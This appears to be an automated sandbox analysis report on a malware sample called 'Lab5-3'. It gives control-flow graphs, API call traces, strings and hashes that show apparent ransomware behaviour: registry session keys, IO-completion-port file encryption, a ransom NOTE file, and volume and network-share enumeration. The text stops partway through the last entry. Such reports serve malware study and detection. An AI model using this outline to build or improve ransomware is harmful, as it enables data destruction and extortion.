                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 451 418620-41864f malloc 452 418651-41865e 451->452 453 418664-41866f 452->453 453->453 454 418671-41869b RegCreateKeyExA 453->454 455 4186a1-418753 RegQueryValueExA * 2 454->455 456 418873-41888e 454->456 457 418755-418757 455->457 458 418759-41875d 455->458 459 418890-41889b 456->459 457->458 460 418778-4187a4 call 404090 call 4023c0 call 40f630 RegCloseKey 457->460 461 4187a9-4187b3 call 418e60 458->461 462 41875f-418761 458->462 459->459 463 41889d-4188b7 call 40f630 call 418e60 459->463 484 4188d9-41891f call 40b4e0 * 2 call 40d7d0 call 40c0e0 460->484 473 4187b9-4187cf call 418c90 461->473 474 418c78-418c82 461->474 462->461 464 418763-418773 Sleep 462->464 463->474 480 4188bd-4188d3 call 418c90 463->480 464->452 473->474 481 4187d5-418871 RegSetValueExA * 2 RegCloseKey 473->481 480->474 480->484 481->484 484->474 494 418925-41893f call 40c0e0 484->494 494->474 497 418945-418968 call 40d720 494->497 497->474 500 41896e-4189da call 4086f0 call 408390 call 4042a0 call 404210 call 404df0 call 404250 call 4053e0 497->500 515 4189e0-4189eb 500->515 515->515 516 4189ed-418a7d call 412570 * 3 malloc call 4124f0 call 412570 call 4124d0 CryptBinaryToStringA 515->516 516->474 529 418a83-418a87 516->529 530 418a90-418a98 529->530 531 418aab-418aad 530->531 532 418a9a 530->532 534 418ac9-418b1a CharUpperA CryptBinaryToStringA 531->534 535 418aaf-418ab8 531->535 533 418aa0-418aa9 532->533 533->531 533->533 534->474 536 418b20-418b22 534->536 537 418ac6-418ac7 535->537 538 418aba-418abc 535->538 540 418b24-418b2c 536->540 537->530 538->537 539 418abe-418ac5 538->539 539->537 541 418b3b-418b3d 540->541 542 418b2e 540->542 544 418b59-418b8d CharUpperA 541->544 545 418b3f-418b48 541->545 543 418b30-418b39 542->543 543->541 543->543 548 418b9a-418bac call 4124d0 544->548 549 418b8f-418b91 544->549 546 418b56-418b57 545->546 547 418b4a-418b4c 545->547 546->540 547->546 551 418b4e-418b55 547->551 554 418bb9-418bc3 548->554 555 418bae-418bb0 548->555 549->548 552 418b93-418b98 549->552 551->546 552->548 552->552 557 418bc5-418bcd 554->557 558 418bcf-418bf2 call 4124d0 554->558 555->554 556 418bb2-418bb7 555->556 556->554 556->556 557->557 557->558 561 418bf4-418bfb 558->561 562 418bfd-418c01 558->562 561->561 561->562 563 418c03-418c0b 562->563 564 418c0d-418c18 562->564 563->563 563->564 565 418c1a-418c1c 564->565 566 418c1e-418c22 564->566 567 418c2b-418c44 call 4124d0 565->567 566->567 568 418c24-418c29 566->568 571 418c57-418c77 free 567->571 572 418c46-418c48 567->572 568->567 568->568 572->571 573 418c4a 572->573 574 418c50-418c55 573->574 574->571 574->574
                                                                                                            APIs
                                                                                                            • malloc.MSVCRT ref: 00418643
                                                                                                            • RegCreateKeyExA.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00418693
                                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000003,00427AA0,00000500), ref: 004186EE
                                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000003,?,00000103), ref: 0041874B
                                                                                                            • Sleep.KERNEL32(00002710), ref: 00418768
                                                                                                            • RegCloseKey.KERNEL32(?,?), ref: 0041879E
                                                                                                              • Part of subcall function 0040C0E0: free.MSVCRT(?,?,?,?,?,?,?,?,00418CDD,?,00426000,00000100,00428330,00000000,00000000,?), ref: 0040C12A
                                                                                                              • Part of subcall function 0040C0E0: calloc.MSVCRT ref: 0040C161
                                                                                                              • Part of subcall function 0040C0E0: free.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040C196
                                                                                                            • malloc.MSVCRT ref: 00418A20
                                                                                                            • CryptBinaryToStringA.CRYPT32(00426000,00000008,00000004,?,00000032), ref: 00418A75
                                                                                                            • CharUpperA.USER32(?), ref: 00418AD8
                                                                                                            • CryptBinaryToStringA.CRYPT32(?,00000008,00000004,00000000,00000032), ref: 00418B12
                                                                                                            • CharUpperA.USER32(00000000), ref: 00418B68
                                                                                                            • free.MSVCRT(?), ref: 00418C61
                                                                                                            Strings
                                                                                                            • Getting session keys from registry, xrefs: 0041877E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: free$BinaryCharCryptQueryStringUpperValuemalloc$CloseCreateSleepcalloc
                                                                                                            • String ID: Getting session keys from registry
                                                                                                            • API String ID: 2471977085-551079499
                                                                                                            • Opcode ID: 000800dd8375b718805f321462774e848b571e07407c5aa4b40a42470250e966
                                                                                                            • Instruction ID: 7585cef803c0380c97e087a7ca3b433ba73a29e6307f047849749a887aafa14a
                                                                                                            • Opcode Fuzzy Hash: 000800dd8375b718805f321462774e848b571e07407c5aa4b40a42470250e966
                                                                                                            • Instruction Fuzzy Hash: 85123C70D04249AFDF11DBB49C05BEFBBB4AF15304F1440AEE944B7282EB785A85C7A9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 575 4180b0-4180be 576 4180c4-4180e3 NtRemoveIoCompletion 575->576 576->576 577 4180e5-4180f7 576->577 578 4180fd-418119 577->578 579 41823e-418241 577->579 582 41811b-41812d call 40f370 578->582 583 41812f-418156 call 408a80 call 408aa0 578->583 580 418247-418263 RtlDosPathNameToNtPathName_U 579->580 581 41831b-41831e 579->581 588 418269-418298 malloc call 4124f0 580->588 589 4182ea-418316 call 4124f0 NtClose GlobalFree * 2 580->589 586 4184c2-4184d4 NtClose GlobalFree * 2 581->586 587 418324-418327 581->587 596 418159-418163 582->596 583->596 586->576 593 41832d-41833d 587->593 594 41841e-418421 587->594 588->589 611 41829a-4182e7 call 4124d0 NtSetInformationFile free 588->611 589->576 599 418340-418344 593->599 600 418423-41843d 594->600 601 41845e-418461 594->601 605 418165-418167 596->605 606 418176-41818d 596->606 607 418346-418351 599->607 608 418358-418375 call 407f50 599->608 609 41844c-41845c 600->609 610 41843f 600->610 601->576 603 418467-418485 601->603 613 418491-418494 603->613 614 418487 603->614 605->606 615 418169-418172 605->615 617 4181a2-4181b4 call 408960 606->617 618 41818f-4181a0 call 40f2c0 606->618 607->599 616 418353 607->616 634 418377-41837b 608->634 635 41838a-4183a9 608->635 612 418495-41849c ReadFile 609->612 620 418441-418444 610->620 621 418446-418449 610->621 611->589 626 4184a2-4184a4 612->626 613->612 624 418489-41848c 614->624 625 41848e 614->625 615->606 627 4184bb 616->627 617->627 636 4181ba-4181be 617->636 618->636 620->609 620->621 621->609 624->613 624->625 625->613 626->576 632 4184aa-4184b5 626->632 627->586 632->576 632->627 634->635 639 41837d 634->639 637 4183c4-4183dd call 4184e0 635->637 638 4183ab-4183af 635->638 640 4181c0-4181d9 636->640 641 4181db-418214 call 419100 636->641 652 4183f8-418419 WriteFile 637->652 653 4183df-4183f6 NtClose GlobalFree * 2 637->653 638->637 642 4183b1 638->642 644 418388 639->644 645 41837f-418386 639->645 646 418228-418239 WriteFile 640->646 654 418216 641->654 655 41821d-418224 641->655 648 4183b3-4183ba 642->648 649 4183bc-4183be 642->649 644->635 645->635 645->644 646->626 648->637 648->649 649->637 652->626 653->652 654->655 655->646
                                                                                                            APIs
                                                                                                            • NtRemoveIoCompletion.NTDLL ref: 004180DB
                                                                                                            • WriteFile.KERNEL32(?,?,?,00000000,?,?,?), ref: 00418233
                                                                                                            • RtlDosPathNameToNtPathName_U.NTDLL(?,?,00000000,00000000), ref: 0041825B
                                                                                                            • malloc.MSVCRT ref: 00418276
                                                                                                            • NtSetInformationFile.NTDLL ref: 004182D6
                                                                                                            • free.MSVCRT(?), ref: 004182E1
                                                                                                            • NtClose.NTDLL ref: 00418300
                                                                                                            • GlobalFree.KERNEL32(?), ref: 0041830E
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00418314
                                                                                                            • __allrem.LIBCMT ref: 0041836C
                                                                                                            • NtClose.NTDLL ref: 004183E9
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004183F0
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004183F6
                                                                                                            • WriteFile.KERNEL32(?,?,-00000604,00000000,?,?,?,00000010,00000000), ref: 00418413
                                                                                                            • ReadFile.KERNEL32(?,?,00040000,00000000,?), ref: 0041849C
                                                                                                            • NtClose.NTDLL ref: 004184C5
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004184CC
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004184D2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeGlobal$File$Close$PathWrite$CompletionInformationNameName_ReadRemove__allremfreemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2690872533-0
                                                                                                            • Opcode ID: 9aa7bc640b88d316a8a6ccfd31aeca62c27436d5e9cc2ce943149f92c2223a7e
                                                                                                            • Instruction ID: ff6bbac03503fa4092cbb3a6534176c0db88dab075db292aedbac87244c7d2f3
                                                                                                            • Opcode Fuzzy Hash: 9aa7bc640b88d316a8a6ccfd31aeca62c27436d5e9cc2ce943149f92c2223a7e
                                                                                                            • Instruction Fuzzy Hash: 24C1AE71504B00DFD720CF25CD44B9BB7E4FF58308F044A2EE99682651EB79E589CB8A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 656 417f20-417f7b call 4124f0 PathRemoveFileSpecW 659 417f80-417f8b 656->659 659->659 660 417f8d-417fe8 wsprintfW CreateFileW 659->660 661 418021-418028 660->661 662 417fea-418007 NtSetInformationFile 660->662 663 418029-41803a GlobalAlloc 662->663 664 418009-41801b NtClose MessageBoxA 662->664 665 418096-4180a4 NtClose 663->665 666 41803c-418080 WriteFile 663->666 664->661 667 418082-41808d 666->667 668 4180a5-4180af 666->668 667->668 669 41808f-418090 GlobalFree 667->669 669->665
                                                                                                            APIs
                                                                                                            • PathRemoveFileSpecW.SHLWAPI(?,?,00000000,00000000), ref: 00417F57
                                                                                                            • wsprintfW.USER32 ref: 00417FBB
                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,50000000,00000000), ref: 00417FDD
                                                                                                            • NtSetInformationFile.NTDLL ref: 00417FFF
                                                                                                            • NtClose.NTDLL ref: 0041800A
                                                                                                            • MessageBoxA.USER32(00000000,Unable to bind NOTE file IOCP %S error: %d,00000000,00000000), ref: 0041801B
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00040068), ref: 00418030
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 00418078
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00418090
                                                                                                            • NtClose.NTDLL ref: 00418097
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobal$AllocCreateFreeInformationMessagePathRemoveSpecWritewsprintf
                                                                                                            • String ID: 6k1$%$%$=1$Unable to bind NOTE file IOCP %S error: %d
                                                                                                            • API String ID: 3428260386-824455736
                                                                                                            • Opcode ID: aec04dac269132711e76bc3ebeb3a0c19038969bdaf2e91d06ca968d22087c12
                                                                                                            • Instruction ID: 3c7789fa63ceab8152487090d97d3f98e68c547c7fcc7fbb425659e4c08859d8
                                                                                                            • Opcode Fuzzy Hash: aec04dac269132711e76bc3ebeb3a0c19038969bdaf2e91d06ca968d22087c12
                                                                                                            • Instruction Fuzzy Hash: DB41BC31A40308ABD7318F64DC0DBDF7BF8EF49715F0046AAF919A6290DBB455448B98
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 670 41a130-41a157 malloc 671 41a321-41a327 670->671 672 41a15d-41a16d GetAdaptersInfo 670->672 673 41a16f-41a188 free malloc 672->673 674 41a18e-41a197 GetAdaptersInfo 672->674 673->671 673->674 675 41a313-41a315 674->675 676 41a19d-41a1a4 674->676 675->671 678 41a317-41a31e free 675->678 676->671 677 41a1aa 676->677 679 41a1b0-41a1b7 677->679 678->671 680 41a303-41a30a 679->680 681 41a1bd-41a211 lstrcmpiA 679->681 680->679 683 41a310 680->683 681->680 682 41a217-41a250 PathRemoveExtensionA call 401e40 call 40f630 681->682 687 41a255-41a25a 682->687 683->675 688 41a260-41a2b3 wsprintfA lstrcmpiA 687->688 689 41a2f3-41a2fa 688->689 690 41a2b5-41a2ce malloc 688->690 689->688 692 41a300 689->692 691 41a2d0-41a2db 690->691 691->691 693 41a2dd-41a2f0 RtlInterlockedPushEntrySList 691->693 692->680 693->689
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: malloc$AdaptersInfofreelstrcmpi$EntryExtensionInterlockedListPathPushRemovewsprintf
                                                                                                            • String ID: H$RLSN
                                                                                                            • API String ID: 42105023-2130604523
                                                                                                            • Opcode ID: d1f165bc71ace9979a498fb9af4e67f82adda923f4e73e8c5fd1175d988e87a5
                                                                                                            • Instruction ID: 20fe545423849105366122e2e05bbda7ad3782775de12c147ce060741212aa96
                                                                                                            • Opcode Fuzzy Hash: d1f165bc71ace9979a498fb9af4e67f82adda923f4e73e8c5fd1175d988e87a5
                                                                                                            • Instruction Fuzzy Hash: 2A51C371C05249DFDB01CBA8D848AEFBBB4AF29314F0841AAD844B7312DB355659CBE6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 694 4172f0-417319 malloc 695 4173f6-4173fc 694->695 696 41731f 694->696 697 417320-417331 GetVolumePathNamesForVolumeNameW 696->697 698 417333-41733e 697->698 699 41735f-417369 GetDriveTypeW 697->699 698->699 700 417340-417356 free malloc 698->700 701 417370-417374 699->701 702 41736b-41736e 699->702 700->697 703 417358-41735e 700->703 704 4173e8-4173ea 701->704 705 417376-4173d6 wsprintfW CreateFileW 701->705 702->701 702->704 704->695 706 4173ec-4173f3 free 704->706 707 4173e1-4173e2 NtClose 705->707 708 4173d8-4173df call 417400 705->708 706->695 707->704 708->704
                                                                                                            APIs
                                                                                                            • malloc.MSVCRT ref: 00417310
                                                                                                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,00000000,00000209,00000209), ref: 00417329
                                                                                                            • free.MSVCRT(00000000), ref: 00417341
                                                                                                            • malloc.MSVCRT ref: 0041734D
                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 00417360
                                                                                                            • wsprintfW.USER32 ref: 004173AB
                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004173CD
                                                                                                            • NtClose.NTDLL ref: 004173E2
                                                                                                            • free.MSVCRT(00000000), ref: 004173ED
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Volumefreemalloc$CloseCreateDriveFileNameNamesPathTypewsprintf
                                                                                                            • String ID: %$\$g$o$t
                                                                                                            • API String ID: 3867046599-3394384039
                                                                                                            • Opcode ID: 9a1f285a984335b2c3b5d4fbb688acc05a71f72ae61a00471cef763623505b72
                                                                                                            • Instruction ID: 1cbdf9fff812283147c1604227288cfda76624560ae53b9ca2b6288d26c4fd58
                                                                                                            • Opcode Fuzzy Hash: 9a1f285a984335b2c3b5d4fbb688acc05a71f72ae61a00471cef763623505b72
                                                                                                            • Instruction Fuzzy Hash: 2921F631E0021CEBDB219BA4AC4CBEFBBB8EB05715F104166EE14E2250D7784A84DBD9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 0041A469
                                                                                                            • malloc.MSVCRT ref: 0041A475
                                                                                                            • RtlInitializeSListHead.NTDLL ref: 0041A488
                                                                                                            • RtlInitializeCriticalSection.NTDLL ref: 0041A493
                                                                                                            • Sleep.KERNEL32(00003A98), ref: 0041A4A4
                                                                                                              • Part of subcall function 0041A130: malloc.MSVCRT ref: 0041A14B
                                                                                                              • Part of subcall function 0041A130: GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0041A168
                                                                                                              • Part of subcall function 0041A130: free.MSVCRT(00000000), ref: 0041A170
                                                                                                              • Part of subcall function 0041A130: malloc.MSVCRT ref: 0041A17C
                                                                                                              • Part of subcall function 0041A130: GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0041A193
                                                                                                              • Part of subcall function 0041A130: lstrcmpiA.KERNEL32(000001B0,?), ref: 0041A209
                                                                                                              • Part of subcall function 0041A130: PathRemoveExtensionA.SHLWAPI(?), ref: 0041A225
                                                                                                            • RtlInterlockedFlushSList.NTDLL ref: 0041A4BA
                                                                                                            • RtlDeleteCriticalSection.NTDLL(004283DC), ref: 0041A4C5
                                                                                                            • WSACleanup.WS2_32 ref: 0041A4CB
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00019BD0,00000000,00000000,?), ref: 0041A4F2
                                                                                                            • NtSetInformationThread.NTDLL ref: 0041A506
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041A51A
                                                                                                            • RtlInterlockedFlushSList.NTDLL ref: 0041A534
                                                                                                            • RtlDeleteCriticalSection.NTDLL(004283DC), ref: 0041A53F
                                                                                                            • WSACleanup.WS2_32 ref: 0041A545
                                                                                                            • free.MSVCRT(?), ref: 0041A555
                                                                                                            • ExitThread.KERNEL32 ref: 0041A560
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalListSectionThreadmalloc$AdaptersCleanupDeleteFlushInfoInitializeInterlockedSleepfree$CreateExitExtensionHeadInformationPathRemoveStartuplstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 2533719550-0
                                                                                                            • Opcode ID: deb318fb5bc1a939bb2f4c2839f6069ee70202c5b136f01af2b9c766f2d3f546
                                                                                                            • Instruction ID: bad515cce3d082cda0727216c2fa794b2487a1ef4ba217794ee3d9150f08fc11
                                                                                                            • Opcode Fuzzy Hash: deb318fb5bc1a939bb2f4c2839f6069ee70202c5b136f01af2b9c766f2d3f546
                                                                                                            • Instruction Fuzzy Hash: 3A218131342204ABE3206B74FC4EB9E3768EB48765F508136F911D51F0DFB894958AAE
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • wvsprintfA.USER32(?,00000000,?), ref: 0040F67C
                                                                                                            • wsprintfA.USER32 ref: 0040F6C5
                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0040F6CE
                                                                                                            • wsprintfA.USER32 ref: 0040F71B
                                                                                                            • RtlEnterCriticalSection.NTDLL(00426948), ref: 0040F73F
                                                                                                            • SetConsoleTextAttribute.KERNEL32(?,0000000A), ref: 0040F753
                                                                                                            • WriteFile.KERNEL32(?,?,00000000,00000000,00000000), ref: 0040F785
                                                                                                            • SetConsoleTextAttribute.KERNEL32(?,0000000F), ref: 0040F78F
                                                                                                            • WriteFile.KERNEL32(?,?,00000000,00000000,00000000), ref: 0040F7BF
                                                                                                            • GetConsoleWindow.KERNEL32 ref: 0040F7C1
                                                                                                            • IsWindowVisible.USER32(00000000), ref: 0040F7CA
                                                                                                            • FlashWindow.USER32(00000000,00000000), ref: 0040F7D7
                                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 0040F7E2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleWindow$AttributeCriticalFileSectionTextWritewsprintf$EnterFlashLeaveLocalTimeVisiblewvsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3789499329-0
                                                                                                            • Opcode ID: 6db8ada49a6fa9376cc054bc43835bfaa8ad5e1859e7a84ecc238507b1d126a7
                                                                                                            • Instruction ID: 5060e21178234e9c7b3c93b993cc3f5c3e4078bb1df41f596c03d86633996232
                                                                                                            • Opcode Fuzzy Hash: 6db8ada49a6fa9376cc054bc43835bfaa8ad5e1859e7a84ecc238507b1d126a7
                                                                                                            • Instruction Fuzzy Hash: 63518171901258AFDB21DBA8DC44BEFBBB8AF09300F0444BAE545A7292D734A649CF65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,0002001F,00000000,?,?,76F02B40,?,74DF0F10), ref: 00416B6E
                                                                                                            • RegDeleteValueW.ADVAPI32(?,00000000,?,?,?,74DF0F10), ref: 00416B9C
                                                                                                            • RegCloseKey.ADVAPI32(?,74DF0F10), ref: 00416BE0
                                                                                                            • wsprintfW.USER32 ref: 00416C67
                                                                                                            • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,?,00000104,?,?,74DF0F10), ref: 00416C87
                                                                                                            • lstrcmpiW.KERNEL32(?,?,?,?,74DF0F10), ref: 00416C9F
                                                                                                            • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,00000000,?,?,74DF0F10), ref: 00416CC1
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,74DF0F10), ref: 00416CCF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Value$Close$CreateDeleteQuerylstrcmpiwsprintf
                                                                                                            • String ID: :$Service %s stopped$k .2
                                                                                                            • API String ID: 209852802-1749210681
                                                                                                            • Opcode ID: c85b1cd58f262a4b994ce1a9a83a52cfa48431cfdbfea77951000bbd8716b04f
                                                                                                            • Instruction ID: c6fd477cb62e55f445015106ad16b5e4325d6db81518b99a34504723aedb9ca7
                                                                                                            • Opcode Fuzzy Hash: c85b1cd58f262a4b994ce1a9a83a52cfa48431cfdbfea77951000bbd8716b04f
                                                                                                            • Instruction Fuzzy Hash: F951C231A00208EBDB11DFA0DD48BEEBBB8EF09314F404066F545B7160EB759689CB98
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • NtCreateIoCompletion.NTDLL(00428228,001F0003,00000000,?), ref: 004193C7
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004180B0,00000000,00000000,?), ref: 00419442
                                                                                                            • NtSetInformationThread.NTDLL ref: 00419452
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004180B0,00000000,00000000,?), ref: 00419466
                                                                                                            • NtSetInformationThread.NTDLL ref: 00419476
                                                                                                            • NtSetInformationThread.NTDLL ref: 00419491
                                                                                                            • NtSetInformationThread.NTDLL ref: 0041949D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Thread$Information$Create$Completion
                                                                                                            • String ID: WWW$7901$u0;4
                                                                                                            • API String ID: 3001912770-3472882075
                                                                                                            • Opcode ID: 6dc0672b803e62ba2f55c9584671237ef486f94f0a10172960c07c1329c525bf
                                                                                                            • Instruction ID: 9e1c17205e841a66c06d8fffb0230576b549e409abe5a581344e3a5dd371a1f9
                                                                                                            • Opcode Fuzzy Hash: 6dc0672b803e62ba2f55c9584671237ef486f94f0a10172960c07c1329c525bf
                                                                                                            • Instruction Fuzzy Hash: 73512E70648340AAE310DF249C81BAFBBE4EF89714F40052EFA959A2D2D7B4D54AC75F
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • WNetOpenEnumW.MPR(00000002,00000000,00000013,00000000,0040FBE5), ref: 0040FC0F
                                                                                                            • malloc.MSVCRT ref: 0040FC23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
